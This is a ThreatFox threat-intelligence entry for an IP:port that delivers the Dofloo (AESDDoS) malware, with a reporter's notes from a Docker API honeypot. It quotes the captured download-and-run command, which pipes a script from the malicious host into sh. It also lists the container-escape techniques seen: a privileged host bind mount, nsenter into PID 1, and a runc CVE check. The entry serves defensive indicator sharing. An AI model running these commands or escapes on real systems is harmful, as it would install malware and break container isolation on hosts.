ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 151.242.125.187:80.

Database Entry

Add tag Delete this IOC  Report False Positive Export IOC (JSON)    Export IOC (CSV)
IOC ID:1817199
IOC: 151.242.125.187:80
IOC Type :ip:port
Threat Type :payload_delivery
Malware: Dofloo
Malware alias:AESDDoS
Confidence Level : Confidence level is high (85%)
Is compromised? : False
ASN:AS61112 AkileCloud
Country:- GB
First seen:2026-05-22 11:36:07 UTC
Last seen:never
UUID:6ff2c91e-55b8-11f1-b930-42010aa4000a
Reporter nullblue67
Reward 5 credits from ThreatFox
Tags:container-breakout docker-exploit Downloader nsenter-escape privileged-container

Avatar
nullblue67
Captured 2026-05-22 02:00-05:00 UTC via Docker API honeypot (/containers/create). Base64-encoded payload: wget -O- http://151.242.125.187/dck | sh || curl -s http://151.242.125.187/dck | sh. Three distinct exec techniques observed targeting Docker daemon: (1) sh -c with Privileged:true + Binds:/:/host (full host filesystem breakout), (2) nsenter --target 1 --mount --uts --ipc --net --pid (process-namespace escape to PID 1), (3) container exec checking RUNC_ACCESSIBLE (CVE-2024-21626 runc escape recon). Attackers: 45.198.224.5 (Vpsvault.host SC, score 1000+, multiple hit waves), 193.160.100.163 (PacketHub, sibling /24 of previously-reported junko-enoshima cluster 193.160.100.154). Host: AKILE LTD (HK).